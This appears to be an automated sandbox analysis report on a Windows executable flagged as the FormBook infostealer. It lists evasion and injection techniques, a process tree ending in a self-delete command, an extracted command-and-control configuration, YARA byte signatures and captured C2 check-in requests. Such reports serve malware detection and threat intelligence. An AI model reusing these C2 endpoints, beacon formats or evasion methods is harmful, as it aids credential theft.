Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report TazxfJHRhq.exe

Overview

General Information

Sample Name:TazxfJHRhq.exe
Analysis ID:383852
MD5:f818665dd48a93c48255d3ceadf92a6e
SHA1:2567c8a3e1a3e3e98782ea8d0d117518ccd4291b
SHA256:6bb8fa14bf9c650a67541ffedff2e3f1c055454b90489653c95aa39284d7eb92
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • TazxfJHRhq.exe (PID: 4736 cmdline: 'C:\Users\user\Desktop\TazxfJHRhq.exe' MD5: F818665DD48A93C48255D3CEADF92A6E)
    • TazxfJHRhq.exe (PID: 5940 cmdline: 'C:\Users\user\Desktop\TazxfJHRhq.exe' MD5: F818665DD48A93C48255D3CEADF92A6E)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 4064 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 5948 cmdline: /c del 'C:\Users\user\Desktop\TazxfJHRhq.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.autotrafficbot.com/evpn/"], "decoy": ["memoriesmade-l.com", "babypowah.com", "usinggroovefunnels.com", "qapjv.com", "kp031.com", "kinfet.com", "markmalls.com", "keithforemandesigns.com", "fydia.com", "jesussaysalllivesmatter.com", "sarachavesportela.com", "standerup.com", "monthlywifi.com", "productsoffholland.com", "newbieadvice.com", "globalnetworkautomation.com", "theholisticbirthco.com", "physicalrobot.com", "thesouthernhomesellers.com", "teamcounteract.com", "icomplementi.com", "jsmsheetmetal.com", "jcernadas.com", "del-tekzen.com", "alekseeva-center.info", "arunkapur.com", "gregismyrealestateagent.com", "soalfintech.com", "notrecondourbania.com", "alum2alum.network", "gototaku.com", "moneymakeideas.com", "dbdcontractlngllc.com", "tor-one.com", "walgreenlitigation.com", "votestephaniezarb.com", "washathome.club", "zhuledao.com", "sonyjewls.com", "oncologyacademe.com", "kuppers.info", "cgpizza.net", "glgshopbd.com", "dodson4tulare.com", "mishtifarmers.com", "a1-2c.com", "oligan-gs.com", "countrysidehomeinvestors.com", "bpro.swiss", "fodiyo.com", "playelementsgame.com", "melhorquesantander.com", "jamessicilia.com", "abundancewithmelissaharvey.com", "vatandoost.com", "curiosityisthecurebook.com", "o8y8.com", "de-knutselkeet.com", "advisorsonecall.com", "homerangeopen.com", "brusselsdesignproject.com", "0449888.com", "psychicsjaneholden.com", "b-sphere.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.TazxfJHRhq.exe.27a0000.4.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.TazxfJHRhq.exe.27a0000.4.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.TazxfJHRhq.exe.27a0000.4.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166b9:$sqlite3step: 68 34 1C 7B E1
        • 0x167cc:$sqlite3step: 68 34 1C 7B E1
        • 0x166e8:$sqlite3text: 68 38 2A 90 C5
        • 0x1680d:$sqlite3text: 68 38 2A 90 C5
        • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
        1.2.TazxfJHRhq.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.TazxfJHRhq.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.theholisticbirthco.com/evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36IhuAvira URL Cloud: Label: malware
          Source: http://www.jcernadas.com/evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36IhuAvira URL Cloud: Label: malware
          Source: http://www.usinggroovefunnels.com/evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36IhuAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.autotrafficbot.com/evpn/"], "decoy": ["memoriesmade-l.com", "babypowah.com", "usinggroovefunnels.com", "qapjv.com", "kp031.com", "kinfet.com", "markmalls.com", "keithforemandesigns.com", "fydia.com", "jesussaysalllivesmatter.com", "sarachavesportela.com", "standerup.com", "monthlywifi.com", "productsoffholland.com", "newbieadvice.com", "globalnetworkautomation.com", "theholisticbirthco.com", "physicalrobot.com", "thesouthernhomesellers.com", "teamcounteract.com", "icomplementi.com", "jsmsheetmetal.com", "jcernadas.com", "del-tekzen.com", "alekseeva-center.info", "arunkapur.com", "gregismyrealestateagent.com", "soalfintech.com", "notrecondourbania.com", "alum2alum.network", "gototaku.com", "moneymakeideas.com", "dbdcontractlngllc.com", "tor-one.com", "walgreenlitigation.com", "votestephaniezarb.com", "washathome.club", "zhuledao.com", "sonyjewls.com", "oncologyacademe.com", "kuppers.info", "cgpizza.net", "glgshopbd.com", "dodson4tulare.com", "mishtifarmers.com", "a1-2c.com", "oligan-gs.com", "countrysidehomeinvestors.com", "bpro.swiss", "fodiyo.com", "playelementsgame.com", "melhorquesantander.com", "jamessicilia.com", "abundancewithmelissaharvey.com", "vatandoost.com", "curiosityisthecurebook.com", "o8y8.com", "de-knutselkeet.com", "advisorsonecall.com", "homerangeopen.com", "brusselsdesignproject.com", "0449888.com", "psychicsjaneholden.com", "b-sphere.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: TazxfJHRhq.exeVirustotal: Detection: 14%Perma Link
          Source: TazxfJHRhq.exeReversingLabs: Detection: 25%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 1.2.TazxfJHRhq.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.cmstp.exe.4af7960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.1.TazxfJHRhq.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.TazxfJHRhq.exe.27a0000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.cmstp.exe.6bd538.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: TazxfJHRhq.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: cmstp.pdbGCTL source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: TazxfJHRhq.exe, 00000000.00000003.210529727.000000001EF00000.00000004.00000001.sdmp, TazxfJHRhq.exe, 00000001.00000002.249342255.0000000000B6F000.00000040.00000001.sdmp, cmstp.exe, 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: TazxfJHRhq.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmp
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,0_2_00405301
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,0_2_00405C94
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_004026BC FindFirstFileA,0_2_004026BC
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 4x nop then pop ebx1_2_00406A9B
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 4x nop then pop edi1_2_004162B4
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 4x nop then pop ebx1_1_00406A9B
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 4x nop then pop edi1_1_004162B4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop ebx4_2_00406A9B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4x nop then pop edi4_2_004162B4

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49745 -> 192.185.48.194:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49745 -> 192.185.48.194:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49745 -> 192.185.48.194:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 52.58.78.16:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 52.58.78.16:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 52.58.78.16:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.autotrafficbot.com/evpn/
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1Host: www.jamessicilia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1Host: www.kinfet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=0M6ZQgL8IcDyCwomro3oU0+S4lgLLFgc0WEYasg9Je1ZokoU9qr9vbqVIYlP2JKTB372&w4=jFNp36Ihu HTTP/1.1Host: www.productsoffholland.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=KkWhScBkby78tLALzdAz8CnCjb47jVkq+/iIMgqrMbFUrtE+6VX7P3g+12tQT1WZakud&w4=jFNp36Ihu HTTP/1.1Host: www.markmalls.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=eugAyVbFjTGCbHTU5QCJaxOKGF+rVHXRgES2jcHdoUQlFxVgByKSQwjGascFDT08oG3Y&w4=jFNp36Ihu HTTP/1.1Host: www.zhuledao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu HTTP/1.1Host: www.jcernadas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu HTTP/1.1Host: www.theholisticbirthco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=MYo3qtR4MoTJM9eEEEQJY+2owLrirHbqorePLbwYxji+asNtirv2kfx8Flc200WiuFJj&w4=jFNp36Ihu HTTP/1.1Host: www.tor-one.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=SbzT885gMwI0SrecOCVR7+X63g3QiQnq4cO3Mq/wdHuk7Bui5+S2HJ4sI04qlEXUDlVA&w4=jFNp36Ihu HTTP/1.1Host: www.de-knutselkeet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=rbKZoqFNxKUJa45rmf723j5e1+/Af1Vmd22uFdYYwCe+W7Lpy/kHCEK0lxAuMCiY39Cm&w4=jFNp36Ihu HTTP/1.1Host: www.autotrafficbot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=lIAMQw8Bc5WvbtZzc5MVHUptsiPc1Sl8tBJqhUvlbuUAA7ypaYYvmQWduCHy/+CL3sQ0&w4=jFNp36Ihu HTTP/1.1Host: www.curiosityisthecurebook.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu HTTP/1.1Host: www.usinggroovefunnels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=uC/MtWgv+YrXZeFWxw8c+UMLGaJCPPY/UiwLcWwP6A/e3Dk62IKxdmGhKI0+YBSelN0N&w4=jFNp36Ihu HTTP/1.1Host: www.cgpizza.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=mJ1WicGgYxGiPfNmi48PwwH9NxkuMiIXMjFvraRfIBMfYxjrtIxgIRAmB9RzgRW7JS2o&w4=jFNp36Ihu HTTP/1.1Host: www.physicalrobot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1Host: www.jamessicilia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1Host: www.kinfet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.58.78.16 52.58.78.16
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: GD-EMEA-DC-CGN1DE GD-EMEA-DC-CGN1DE
          Source: Joe Sandbox ViewASN Name: ANONYMIZEEpikNetworkCH ANONYMIZEEpikNetworkCH
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1Host: www.jamessicilia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1Host: www.kinfet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=0M6ZQgL8IcDyCwomro3oU0+S4lgLLFgc0WEYasg9Je1ZokoU9qr9vbqVIYlP2JKTB372&w4=jFNp36Ihu HTTP/1.1Host: www.productsoffholland.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=KkWhScBkby78tLALzdAz8CnCjb47jVkq+/iIMgqrMbFUrtE+6VX7P3g+12tQT1WZakud&w4=jFNp36Ihu HTTP/1.1Host: www.markmalls.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=eugAyVbFjTGCbHTU5QCJaxOKGF+rVHXRgES2jcHdoUQlFxVgByKSQwjGascFDT08oG3Y&w4=jFNp36Ihu HTTP/1.1Host: www.zhuledao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu HTTP/1.1Host: www.jcernadas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu HTTP/1.1Host: www.theholisticbirthco.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=MYo3qtR4MoTJM9eEEEQJY+2owLrirHbqorePLbwYxji+asNtirv2kfx8Flc200WiuFJj&w4=jFNp36Ihu HTTP/1.1Host: www.tor-one.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=SbzT885gMwI0SrecOCVR7+X63g3QiQnq4cO3Mq/wdHuk7Bui5+S2HJ4sI04qlEXUDlVA&w4=jFNp36Ihu HTTP/1.1Host: www.de-knutselkeet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=rbKZoqFNxKUJa45rmf723j5e1+/Af1Vmd22uFdYYwCe+W7Lpy/kHCEK0lxAuMCiY39Cm&w4=jFNp36Ihu HTTP/1.1Host: www.autotrafficbot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=lIAMQw8Bc5WvbtZzc5MVHUptsiPc1Sl8tBJqhUvlbuUAA7ypaYYvmQWduCHy/+CL3sQ0&w4=jFNp36Ihu HTTP/1.1Host: www.curiosityisthecurebook.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu HTTP/1.1Host: www.usinggroovefunnels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=uC/MtWgv+YrXZeFWxw8c+UMLGaJCPPY/UiwLcWwP6A/e3Dk62IKxdmGhKI0+YBSelN0N&w4=jFNp36Ihu HTTP/1.1Host: www.cgpizza.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=mJ1WicGgYxGiPfNmi48PwwH9NxkuMiIXMjFvraRfIBMfYxjrtIxgIRAmB9RzgRW7JS2o&w4=jFNp36Ihu HTTP/1.1Host: www.physicalrobot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1Host: www.jamessicilia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1Host: www.kinfet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.jamessicilia.com
